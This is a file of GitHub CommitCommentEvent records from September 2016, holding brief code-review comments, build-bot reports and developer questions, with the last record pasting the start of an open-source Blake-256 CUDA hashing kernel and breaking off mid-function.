{"id":"4566793928","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"StackExchange/Channels.WebSockets"},"payload":{"comment":{"id":19032414,"position":88,"line":156,"path":"src/Channels.WebSockets/WebSocketsProtocol.cs","commit_id":"f6141ed0c8776d36d3f3f633103a5957e54f09b1","created_at":"2016-09-15T08:41:46Z","updated_at":"2016-09-15T08:41:46Z","body":"you can pass the span you create earlier."}},"created_at":"2016-09-15T08:41:46Z"}
{"id":"4566794076","type":"CommitCommentEvent","actor":{"login":"jhobz"},"repo":{"name":"glacials/splits-io"},"payload":{"comment":{"id":19032415,"position":null,"line":null,"path":null,"commit_id":"b514e052e68333070918be9e60701dceb824d862","created_at":"2016-09-15T08:41:48Z","updated_at":"2016-09-15T08:41:48Z","body":"Gotcha, thanks!"}},"created_at":"2016-09-15T08:41:48Z"}
{"id":"4566798705","type":"CommitCommentEvent","actor":{"login":"mauricewillemsen"},"repo":{"name":"peace-4-you/TI2206-2016-2017"},"payload":{"comment":{"id":19032427,"position":null,"line":null,"path":null,"commit_id":"b9cf8f24757cddfeed9add5cc785328a8c7bc524","created_at":"2016-09-15T08:42:53Z","updated_at":"2016-09-15T08:42:53Z","body":"@peace-4-you Method addBubble() doesn't seem to work. Can't add bubble cause it gives a nullpointer exception when drawing"}},"created_at":"2016-09-15T08:42:53Z"}
{"id":"4566801394","type":"CommitCommentEvent","actor":{"login":"treo"},"repo":{"name":"deeplearning4j/libnd4j"},"payload":{"comment":{"id":19032434,"position":null,"line":null,"path":null,"commit_id":"1af297967e0a45ed44489ead826695121037aad3","created_at":"2016-09-15T08:43:32Z","updated_at":"2016-09-15T08:43:32Z","body":"@saudet \r\nCan't find a way to make this work across the board. As Windows doesn't seem to care that much about RPATH anyway, I'll simply revert this change.\r\n\r\nNote: On Linux the expansion is still wrong on the first calls to g++ but when the linker is invoked it is magically right again. So something is still problematic here, but it ends up in the correct behavior in the place where it matters. Using the recommended way of setting `CMAKE_INSTALL_RPATH`, I still couldn't make it work."}},"created_at":"2016-09-15T08:43:32Z"}
{"id":"4566806564","type":"CommitCommentEvent","actor":{"login":"huei-tan-sociomantic"},"repo":{"name":"damian-rodriguez-sociomantic/flounder"},"payload":{"comment":{"id":19032445,"position":15,"line":25,"path":"src/core/flounder.js","commit_id":"7365bdb1f827e80791e3d2ece5e92d842b14fdef","created_at":"2016-09-15T08:44:44Z","updated_at":"2016-09-15T08:44:44Z","body":"Thanks! \r\n\r\nI'm using the Multiselect and there is no way to modify the sentence 😅 "}},"created_at":"2016-09-15T08:44:44Z"}
{"id":"4566806863","type":"CommitCommentEvent","actor":{"login":"mauricewillemsen"},"repo":{"name":"peace-4-you/TI2206-2016-2017"},"payload":{"comment":{"id":19032447,"position":null,"line":null,"path":null,"commit_id":"b9cf8f24757cddfeed9add5cc785328a8c7bc524","created_at":"2016-09-15T08:44:48Z","updated_at":"2016-09-15T08:44:48Z","body":"@peace-4-you second thing, giving start coördinate to the arena class doesn't result in another position of the arena"}},"created_at":"2016-09-15T08:44:48Z"}
{"id":"4566806936","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"aezumezu/string-classes"},"payload":{"comment":{"id":19032448,"position":1,"line":1,"path":"src/string-classes.js","commit_id":"e71bb06eba4e31c2de92839dd30d6901188b1a02","created_at":"2016-09-15T08:44:49Z","updated_at":"2016-09-15T08:44:49Z","body":"***Nitpick***\r\n1) Wrap your entire code in a closure to avoid corrupting the global namespace.\r\n2) Use `const` instead of `let` for values that are not reassigned.\r\n3) You can't be using `use strict` in all your methods. \r\n**E.X:**\r\n```(function(){\r\n         'use strict'\r\n        // Your code\r\n        \r\n        })()\r\n\r\n"}},"created_at":"2016-09-15T08:44:49Z"}
{"id":"4566812097","type":"CommitCommentEvent","actor":{"login":"mlindauer"},"repo":{"name":"automl/SMAC3"},"payload":{"comment":{"id":19032459,"position":14,"line":154,"path":"smac/smbo/smbo.py","commit_id":"4f186e57b37c24d82a1229bb3c0d6f7fe63bb6bc","created_at":"2016-09-15T08:46:01Z","updated_at":"2016-09-15T08:46:01Z","body":"I think the SMBO class is not the right place to add this.\r\nI would prefer to have it in the TA classes."}},"created_at":"2016-09-15T08:46:01Z"}
{"id":"4566812924","type":"CommitCommentEvent","actor":{"login":"jonashaag"},"repo":{"name":"vmprof/vmprof-server"},"payload":{"comment":{"id":19032465,"position":null,"line":null,"path":null,"commit_id":"77c67fe358b3d32844069434b8c2a154d80e6346","created_at":"2016-09-15T08:46:13Z","updated_at":"2016-09-15T08:46:13Z","body":"I recommend squashing the migrations, or renaming the 0002 migration, as it doesn't really help understanding what has been added"}},"created_at":"2016-09-15T08:46:13Z"}
{"id":"4566812937","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19032466,"position":null,"line":null,"path":null,"commit_id":"31a3c2ff74769e43501e48d244eae014d6a49821","created_at":"2016-09-15T08:46:13Z","updated_at":"2016-09-15T08:46:13Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 26](http://munit-050:8112/tc/viewLog.html?buildId=99037&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T08:46:13Z"}
{"id":"4566818595","type":"CommitCommentEvent","actor":{"login":"fanatic007"},"repo":{"name":"fanatic007/Notapp"},"payload":{"comment":{"id":19032487,"position":3,"line":64,"path":"app/app.iml","commit_id":"8f1dbcb4de7a9c0cd5bab1d9867784c39e5eb287","created_at":"2016-09-15T08:47:32Z","updated_at":"2016-09-15T08:47:32Z","body":"yes it is [there](https://play.google.com/store/apps/details?id=in.co.rubberduck.notapp). And no , I still can use it by commands."}},"created_at":"2016-09-15T08:47:32Z"}
{"id":"4566819132","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19032490,"position":72,"line":94,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-15T08:47:39Z","updated_at":"2016-09-15T08:47:39Z","body":"Doesn't need a whole new ASCII art picture, but some words would be nice."}},"created_at":"2016-09-15T08:47:39Z"}
{"id":"4566824267","type":"CommitCommentEvent","actor":{"login":"madhavaramu"},"repo":{"name":"madhavaramu/Survey"},"payload":{"comment":{"id":19032502,"position":16,"line":16,"path":"README.md","commit_id":"1a7d5405a70ca19065d6e8e873f0023778529b1b","created_at":"2016-09-15T08:48:53Z","updated_at":"2016-09-15T08:48:53Z","body":"![usurvey_deployment](https://cloud.githubusercontent.com/assets/22054441/18543774/1eac16b2-7b4f-11e6-992b-7647c8337dd3.png)\r\n"}},"created_at":"2016-09-15T08:48:53Z"}
{"id":"4566825382","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19032505,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T08:49:09Z","updated_at":"2016-09-15T08:49:09Z","body":"@mcostalba @snicolet I have prepared [branch ](https://github.com/pb00068/Stockfish/tree/correctpin3) for another bugfix-attempt. As suggested by Stephane it includes also the bug-fix proposed by Ronald to run both fixes within a single SPRT[-3,1] test. Can you please take a look at this and say if this should be the next bug-fix attempt (hopefully the last one) we should run? Thanks in advance"}},"created_at":"2016-09-15T08:49:09Z"}
{"id":"4566825443","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"aezumezu/string-classes"},"payload":{"comment":{"id":19032508,"position":34,"line":34,"path":"src/string-classes.js","commit_id":"e71bb06eba4e31c2de92839dd30d6901188b1a02","created_at":"2016-09-15T08:49:10Z","updated_at":"2016-09-15T08:49:10Z","body":"**Code Quality**\r\nUse eslint. Whitespace needed. EX: `str.substring(1, 4)`"}},"created_at":"2016-09-15T08:49:10Z"}
{"id":"4566827101","type":"CommitCommentEvent","actor":{"login":"mcr42"},"repo":{"name":"GROSSWEBER/git-some"},"payload":{"comment":{"id":19032517,"position":null,"line":null,"path":null,"commit_id":"8b425961ea3d0d30acba4cef73f6c521ce174ebc","created_at":"2016-09-15T08:49:35Z","updated_at":"2016-09-15T08:49:35Z","body":"nice. :+1: "}},"created_at":"2016-09-15T08:49:35Z"}
{"id":"4566828354","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032524,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T08:49:53Z","updated_at":"2016-09-15T08:49:53Z","body":"Need \"bash\" in Windows?"}},"created_at":"2016-09-15T08:49:53Z"}
{"id":"4566830906","type":"CommitCommentEvent","actor":{"login":"tadatuta"},"repo":{"name":"bem/bem-method"},"payload":{"comment":{"id":19032531,"position":14,"line":50,"path":"method/bem-for-css/bem-for-css.en.md","commit_id":"de71357539f09e6dc3b2e997e28caef70cd08ca5","created_at":"2016-09-15T08:50:27Z","updated_at":"2016-09-15T08:50:27Z","body":"Combination **of** the tag...?"}},"created_at":"2016-09-15T08:50:27Z"}
{"id":"4566831991","type":"CommitCommentEvent","actor":{"login":"tadatuta"},"repo":{"name":"bem/bem-method"},"payload":{"comment":{"id":19032533,"position":5,"line":40,"path":"method/bem-for-css/bem-for-css.en.md","commit_id":"de71357539f09e6dc3b2e997e28caef70cd08ca5","created_at":"2016-09-15T08:50:43Z","updated_at":"2016-09-15T08:50:43Z","body":"element ~~in~~ of the `header` block?"}},"created_at":"2016-09-15T08:50:43Z"}
{"id":"4566835036","type":"CommitCommentEvent","actor":{"login":"juhyun10"},"repo":{"name":"juhyun10/DesignPattern"},"payload":{"comment":{"id":19032546,"position":33,"line":33,"path":"DesignPattern/src/chap01/objectOrientedModeling/Page31_Course.java","commit_id":"10eb1d9466b299d5efbbfd23c0eb0e6fb67a8dc5","created_at":"2016-09-15T08:51:27Z","updated_at":"2016-09-15T08:51:27Z","body":"ggg"}},"created_at":"2016-09-15T08:51:27Z"}
{"id":"4566836805","type":"CommitCommentEvent","actor":{"login":"gaocegege"},"repo":{"name":"gzc/leetcode"},"payload":{"comment":{"id":19032551,"position":null,"line":null,"path":null,"commit_id":"44574c712e9fdecb257c3090e3297e5d8acda170","created_at":"2016-09-15T08:51:52Z","updated_at":"2016-09-15T08:51:52Z","body":"Orz\r\n全刷完了啊"}},"created_at":"2016-09-15T08:51:52Z"}
{"id":"4566837237","type":"CommitCommentEvent","actor":{"login":"Andycar"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19032552,"position":null,"line":null,"path":null,"commit_id":"5989da3d46dab497a2ec03ef6c9c42dc25f0b612","created_at":"2016-09-15T08:51:59Z","updated_at":"2016-09-15T08:51:59Z","body":"I would be glad to teach, but I'm not a programmer in any way :) \r\nJust working in some Samsung department.\r\nSome other programmer has shown me how to cherry-pick the other day - I didn't understand a single word :)"}},"created_at":"2016-09-15T08:51:59Z"}
{"id":"4566837371","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"aezumezu/string-classes"},"payload":{"comment":{"id":19032553,"position":80,"line":80,"path":"src/string-classes.js","commit_id":"e71bb06eba4e31c2de92839dd30d6901188b1a02","created_at":"2016-09-15T08:52:01Z","updated_at":"2016-09-15T08:52:01Z","body":"**Code Quality**\r\nUnwanted whitespace. Fix your eslint and you'd be fine."}},"created_at":"2016-09-15T08:52:01Z"}
{"id":"4566839468","type":"CommitCommentEvent","actor":{"login":"julianoes"},"repo":{"name":"PX4/DriverFramework"},"payload":{"comment":{"id":19032557,"position":null,"line":null,"path":null,"commit_id":"6bdc8bce97c619a77276d183f88ee2d6efce4cbf","created_at":"2016-09-15T08:52:32Z","updated_at":"2016-09-15T08:52:32Z","body":"@kd0aij I'm confused. Where is the sign of the x axis flipped? Is that visible in the data sheet? Is the current implementation wrong?"}},"created_at":"2016-09-15T08:52:32Z"}
{"id":"4566840898","type":"CommitCommentEvent","actor":{"login":"fgomez02"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032560,"position":69,"line":69,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T08:52:50Z","updated_at":"2016-09-15T08:52:50Z","body":"I use var_mgi_2 when I create a histogram of coverage.  See lines 103 -114.  I just wanted a version that was not touched by the subsetting to create a figure"}},"created_at":"2016-09-15T08:52:50Z"}
{"id":"4566842688","type":"CommitCommentEvent","actor":{"login":"ghosthope"},"repo":{"name":"ajaxorg/ace"},"payload":{"comment":{"id":19032565,"position":89,"line":89,"path":"lib/ace/autocomplete_popup_tokenizer_test.js","commit_id":"63b811a7a6993962ebb1810413362d0732858259","created_at":"2016-09-15T08:53:14Z","updated_at":"2016-09-15T08:53:14Z","body":"Extra comma is here. \r\n\r\nLive long and prosper \\\\//"}},"created_at":"2016-09-15T08:53:14Z"}
{"id":"4566844619","type":"CommitCommentEvent","actor":{"login":"fgomez02"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032571,"position":170,"line":170,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T08:53:38Z","updated_at":"2016-09-15T08:53:38Z","body":"OK.  I can change that. "}},"created_at":"2016-09-15T08:53:38Z"}
{"id":"4566847631","type":"CommitCommentEvent","actor":{"login":"fgomez02"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032585,"position":237,"line":237,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T08:54:20Z","updated_at":"2016-09-15T08:54:20Z","body":"OK.  I can add a comment. Should have done that. "}},"created_at":"2016-09-15T08:54:20Z"}
{"id":"4566848318","type":"CommitCommentEvent","actor":{"login":"pmario"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":19032586,"position":6,"line":15,"path":"core/palettes/Blanca.tid","commit_id":"16301532bfed17564e175b066ba4f8da1ee70ffe","created_at":"2016-09-15T08:54:29Z","updated_at":"2016-09-15T08:54:29Z","body":"I did test \"unset\" yesterday and it seems to work in the same way as \"no setting\"\r\n\r\n>I hate Firefox's promiscuous CSS warnings...\r\n\r\nChrome (on windows) does the same thing. ... The problem is: If we don't fix it, we can't distinguish between \"real issues\" and \"intentional\" from now on, which imo is bad. "}},"created_at":"2016-09-15T08:54:29Z"}
{"id":"4566849029","type":"CommitCommentEvent","actor":{"login":"yuuuking"},"repo":{"name":"yusei1224/protospace"},"payload":{"comment":{"id":19032588,"position":11,"line":14,"path":"README.md","commit_id":"c5c78f28a824200170548f9ae11f0bf08ca7b288","created_at":"2016-09-15T08:54:39Z","updated_at":"2016-09-15T08:54:39Z","body":"アソシエーションの記述漏れがありますね"}},"created_at":"2016-09-15T08:54:39Z"}
{"id":"4566854096","type":"CommitCommentEvent","actor":{"login":"GordCaswell"},"repo":{"name":"sheabunge/GitPortable"},"payload":{"comment":{"id":19032594,"position":null,"line":null,"path":null,"commit_id":"d8bdb20c095cb0ea14574c222604bc7bb988e860","created_at":"2016-09-15T08:55:47Z","updated_at":"2016-09-15T08:55:47Z","body":"The file wasn't uploaded by sheabunge for some reason. You can grab it here: https://drive.google.com/file/d/0Byzk8vcx4EYONDF5cWlKQkZTZWc/view?usp=sharing"}},"created_at":"2016-09-15T08:55:47Z"}
{"id":"4566856230","type":"CommitCommentEvent","actor":{"login":"gogregor"},"repo":{"name":"commercetools/commercetools-jvm-sdk"},"payload":{"comment":{"id":19032600,"position":null,"line":null,"path":null,"commit_id":"9bee4d33a42870652460f18238ea93ad98a5d11d","created_at":"2016-09-15T08:56:15Z","updated_at":"2016-09-15T08:56:15Z","body":"👍 "}},"created_at":"2016-09-15T08:56:15Z"}
{"id":"4566859077","type":"CommitCommentEvent","actor":{"login":"ControlTheBit"},"repo":{"name":"ControlTheBit/geocachingUtils"},"payload":{"comment":{"id":19032605,"position":null,"line":null,"path":null,"commit_id":"dcae6388e32b532f5b516d5d841b7fa6f6323af8","created_at":"2016-09-15T08:56:55Z","updated_at":"2016-09-15T08:56:55Z","body":"closes #1 "}},"created_at":"2016-09-15T08:56:55Z"}
{"id":"4566859911","type":"CommitCommentEvent","actor":{"login":"vomikan"},"repo":{"name":"vomikan/moneymanagerex"},"payload":{"comment":{"id":19032607,"position":null,"line":null,"path":null,"commit_id":"fb7a3a8037d3a4ae24545b1fb0466ed322a2e7f3","created_at":"2016-09-15T08:57:07Z","updated_at":"2016-09-15T08:57:07Z","body":"https://github.com/cesanta/mongoose/releases/tag/6.5"}},"created_at":"2016-09-15T08:57:07Z"}
{"id":"4566862068","type":"CommitCommentEvent","actor":{"login":"S-mardii"},"repo":{"name":"tinymce/tinymce"},"payload":{"comment":{"id":19032611,"position":5,"line":5,"path":"tests/tinymce/text/Zwsp.js","commit_id":"1696e387e818d9c3f4e2e2d8871f0218208a0212","created_at":"2016-09-15T08:57:34Z","updated_at":"2016-09-15T08:57:34Z","body":"Noted with thanks"}},"created_at":"2016-09-15T08:57:34Z"}
{"id":"4566863165","type":"CommitCommentEvent","actor":{"login":"fgomez02"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032613,"position":null,"line":null,"path":null,"commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T08:57:49Z","updated_at":"2016-09-15T08:57:49Z","body":"I was checking things over and I am concerned about the creation of the mutations_mgi matrix. If I do  sum(as.numeric(mutations_mgi[,\"CREBBP\"]))  for example I get 20.  But when I look in rec_mgi_b to me it seems like there are 30 mutations.  Did I screw something up or should I expect these to be inconsistent? "}},"created_at":"2016-09-15T08:57:49Z"}
{"id":"4566865992","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19032618,"position":null,"line":null,"path":null,"commit_id":"96af43f4445411a8c2db4faf01ce10496a01590c","created_at":"2016-09-15T08:58:27Z","updated_at":"2016-09-15T08:58:27Z","body":"All's good. Let me know if you need someone to help test as soon as builds are relatively safe / stable enough to use. :)"}},"created_at":"2016-09-15T08:58:27Z"}
{"id":"4566867524","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19032621,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T08:58:48Z","updated_at":"2016-09-15T08:58:48Z","body":"What should it be called?"}},"created_at":"2016-09-15T08:58:48Z"}
{"id":"4566871927","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19032630,"position":null,"line":null,"path":null,"commit_id":"e0c4de27d031b970cf653951ddd78f23cd3fa509","created_at":"2016-09-15T08:59:48Z","updated_at":"2016-09-15T08:59:48Z","body":"Interesting. Nice work"}},"created_at":"2016-09-15T08:59:48Z"}
{"id":"4566873300","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19032633,"position":null,"line":null,"path":null,"commit_id":"7df15076fdba694f705ec96f8a6316e3ecd3f667","created_at":"2016-09-15T09:00:08Z","updated_at":"2016-09-15T09:00:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CsMTT9Bm&#x2F;1992-bugzilla-bug-992019-ceph-deploy-create-osd-may-not-set-guid-of-existing-journal-partition\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bugzilla – Bug 992019 &quot;ceph-deploy create osd&quot; may not set GUID of existing journal partition</a>"}},"created_at":"2016-09-15T09:00:08Z"}
{"id":"4566873508","type":"CommitCommentEvent","actor":{"login":"gplssm"},"repo":{"name":"openego/ego.powerflow"},"payload":{"comment":{"id":19032635,"position":null,"line":null,"path":null,"commit_id":"1c21a38807e638353065f11053bf602a0bb8a2e2","created_at":"2016-09-15T09:00:11Z","updated_at":"2016-09-15T09:00:11Z","body":":+1: "}},"created_at":"2016-09-15T09:00:11Z"}
{"id":"4566875466","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19032644,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-15T09:00:36Z","updated_at":"2016-09-15T09:00:36Z","body":"![Szeptember 15. - Csütörtök](http://ujlipot.vakvarju.com/data/napimenu/23.jpg?v=1473664780)\nZellerkrémleves fokhagymás krutonnal\r\nSertéspörkölt tarhonyával, csemege uborkával\r\nBécsi diós rácsos"}},"created_at":"2016-09-15T09:00:36Z"}
{"id":"4566876631","type":"CommitCommentEvent","actor":{"login":"S-mardii"},"repo":{"name":"tinymce/tinymce"},"payload":{"comment":{"id":19032647,"position":5,"line":5,"path":"tests/tinymce/text/Zwsp.js","commit_id":"1696e387e818d9c3f4e2e2d8871f0218208a0212","created_at":"2016-09-15T09:00:50Z","updated_at":"2016-09-15T09:00:50Z","body":"Oh one more question. Do I just need to add this files into wp-includes of my wordpress?\r\n"}},"created_at":"2016-09-15T09:00:50Z"}
{"id":"4566879278","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19032654,"position":207,"line":607,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-15T09:01:25Z","updated_at":"2016-09-15T09:01:25Z","body":"The unpredictable kind? The answer could be 1 if they are far from equal. If you divide by a float and then multiply it with the same float, you won't get the same answer back. That sort of thing."}},"created_at":"2016-09-15T09:01:25Z"}
{"id":"4566880789","type":"CommitCommentEvent","actor":{"login":"mfeurer"},"repo":{"name":"automl/SMAC3"},"payload":{"comment":{"id":19032659,"position":14,"line":154,"path":"smac/smbo/smbo.py","commit_id":"4f186e57b37c24d82a1229bb3c0d6f7fe63bb6bc","created_at":"2016-09-15T09:01:45Z","updated_at":"2016-09-15T09:01:45Z","body":"This would make it fail as early as possible. Also, if we add new TAs we would don't need to encode that they don't use the memory limit, but have a single point in the code where this is encoded."}},"created_at":"2016-09-15T09:01:45Z"}
{"id":"4566881411","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19032660,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T09:01:53Z","updated_at":"2016-09-15T09:01:53Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T09:01:53Z"}
{"id":"4566883363","type":"CommitCommentEvent","actor":{"login":"micahaza"},"repo":{"name":"davedevelopment/phpmig"},"payload":{"comment":{"id":19032663,"position":null,"line":null,"path":null,"commit_id":"cd37044a79d95fcbbe83eecc0b3ace3ed34fdb59","created_at":"2016-09-15T09:02:16Z","updated_at":"2016-09-15T09:02:16Z","body":"if the result is already an array it will cause nasty problems like this:\r\nPHP Fatal error:  Call to a member function toArray() on a non-object in .../vendor/davedevelopment/phpmig/src/Phpmig/Adapter/Illuminate/Database.php on line 47"}},"created_at":"2016-09-15T09:02:16Z"}
{"id":"4566885023","type":"CommitCommentEvent","actor":{"login":"dumblob"},"repo":{"name":"daokoder/dao"},"payload":{"comment":{"id":19032669,"position":22,"line":209,"path":"kernel/daoNamespace.c","commit_id":"7c1eb150f5951b24f12fe67ac7da7b48327279a1","created_at":"2016-09-15T09:02:34Z","updated_at":"2016-09-15T09:02:34Z","body":"Shouldn't this be rather `for(i=0; i<sizeof(typer->bases)/sizeof(typer->bases[0]); i++){`? It appears to be also on other places in this commit."}},"created_at":"2016-09-15T09:02:34Z"}
{"id":"4566891090","type":"CommitCommentEvent","actor":{"login":"harry3030"},"repo":{"name":"harry3030/harry"},"payload":{"comment":{"id":19032681,"position":null,"line":null,"path":"README.md","commit_id":"9d03f9756f33253cd3192a67a53c11fd0cb19dd3","created_at":"2016-09-15T09:03:57Z","updated_at":"2016-09-15T09:03:57Z","body":"/**\r\n * Blake-256 Cuda Kernel (Tested on SM 5.0)\r\n *\r\n * Tanguy Pruvot - Nov. 2014\r\n */\r\n\r\n#define PRECALC64 1\r\n\r\n#include \"miner.h\"\r\n\r\nextern \"C\" {\r\n#include \"sph/sph_blake.h\"\r\n}\r\n\r\n#include <cstdint>\r\n#include <memory.h>\r\n\r\n\r\n/* threads per block and throughput (intensity) */\r\n#define TPB 128\r\n\r\n/* added in sph_blake.c */\r\nextern \"C\" int blake256_rounds = 14;\r\n\r\n/* hash by cpu with blake 256 */\r\nextern \"C\" void blake256hash(void *output, const void *input, int8_t rounds = 14)\r\n{\r\n\tuchar hash[64];\r\n\tsph_blake256_context ctx;\r\n\r\n\tblake256_rounds = rounds;\r\n\r\n\tsph_blake256_init(&ctx);\r\n\tsph_blake256(&ctx, input, 80);\r\n\tsph_blake256_close(&ctx, hash);\r\n\r\n\tmemcpy(output, hash, 32);\r\n}\r\n\r\n#include \"cuda_helper.h\"\r\n\r\n#if PRECALC64\r\n__constant__ uint32_t _ALIGN(32) d_data[15];\r\nstatic THREAD uint32_t *h_data;\r\n#else\r\n__constant__ static uint32_t _ALIGN(32) c_data[20];\r\n/* midstate hash cache, this algo is run on 2 parts */\r\n__device__ static uint32_t cache[8];\r\n__device__ static uint32_t prevsum = 0;\r\n/* crc32.c */\r\nextern \"C\" uint32_t crc32_u32t(const uint32_t *buf, size_t size);\r\n#endif\r\n\r\n/* 8 adapters max */\r\nstatic uint32_t *d_resNonce[MAX_GPUS];\r\nstatic THREAD uint32_t *h_resNonce;\r\n\r\n/* max count of found nonces in one call */\r\n#define NBN 2\r\nstatic uint32_t extra_results[MAX_GPUS][NBN] = { UINT32_MAX };\r\n\r\n#if !PRECALC64\r\n__device__ __constant__\r\nstatic const uint32_t __align__(32) c_IV256[8] = {\r\n\tSPH_C32(0x6A09E667), SPH_C32(0xBB67AE85),\r\n\tSPH_C32(0x3C6EF372), SPH_C32(0xA54FF53A),\r\n\tSPH_C32(0x510E527F), SPH_C32(0x9B05688C),\r\n\tSPH_C32(0x1F83D9AB), SPH_C32(0x5BE0CD19)\r\n};\r\n#endif\r\n\r\n#define GSPREC(a,b,c,d,x,y) { \\\r\n\tv[a] += (m[x] ^ c_u256[y]) + v[b]; \\\r\n\tv[d] = __byte_perm(v[d] ^ v[a],0, 0x1032); \\\r\n\tv[c] += v[d]; \\\r\n\tv[b] = ROTR32(v[b] ^ v[c], 12); \\\r\n\tv[a] += (m[y] ^ c_u256[x]) + v[b]; \\\r\n\tv[d] = __byte_perm(v[d] ^ v[a],0, 0x0321); \\\r\n\tv[c] += v[d]; \\\r\n\tv[b] = ROTR32(v[b] ^ v[c], 7); \\\r\n\t}\r\n\r\n/* Second part (64-80) msg never change, store it */\r\n__device__ static\r\nvoid blake256_compress(uint32_t *h, const uint32_t *block, const uint32_t T0, const int rounds)\r\n{\r\n\tuint32_t /*_ALIGN(8)*/ m[16];\r\n\tuint32_t v[16];\r\n\r\n\tm[0] = block[0];\r\n\tm[1] = block[1];\r\n\tm[2] = block[2];\r\n\tm[3] = block[3];\r\n\r\n\tconst uint32_t c_u256[16] = \r\n\t{\r\n\t\tSPH_C32(0x243F6A88), SPH_C32(0x85A308D3),\r\n\t\tSPH_C32(0x13198A2E), SPH_C32(0x03707344),\r\n\t\tSPH_C32(0xA4093822), SPH_C32(0x299F31D0),\r\n\t\tSPH_C32(0x082EFA98), SPH_C32(0xEC4E6C89),\r\n\t\tSPH_C32(0x452821E6), SPH_C32(0x38D01377),\r\n\t\tSPH_C32(0xBE5466CF), SPH_C32(0x34E90C6C),\r\n\t\tSPH_C32(0xC0AC29B7), SPH_C32(0xC97C50DD),\r\n\t\tSPH_C32(0x3F84D5B5), SPH_C32(0xB5470917)\r\n\t};\r\n\r\n\t const uint32_t c_Padding[16] = {\r\n\t\t0, 0, 0, 0,\r\n\t\t0x80000000UL, 0, 0, 0,\r\n\t\t0, 0, 0, 0,\r\n\t\t0, 1, 0, 640,\r\n\t};\r\n\r\n\r\n\t#pragma unroll\r\n\tfor (uint32_t i = 4; i < 16; i++) \r\n\t{\r\n#if PRECALC64\r\n\t\tm[i] = c_Padding[i];\r\n#else\r\n\t\tm[i] = (T0 == 0x200) ? block[i] : c_Padding[i];\r\n#endif\r\n\t}\r\n\r\n#pragma unroll\r\n\tfor(uint32_t i = 0; i < 8; i++)\r\n\t\tv[i] = h[i];\r\n\r\n\tv[ 8] = c_u256[0];\r\n\tv[ 9] = c_u256[1];\r\n\tv[10] = c_u256[2];\r\n\tv[11] = c_u256[3];\r\n\r\n\tv[12] = c_u256[4] ^ T0;\r\n\tv[13] = c_u256[5] ^ T0;\r\n\tv[14] = 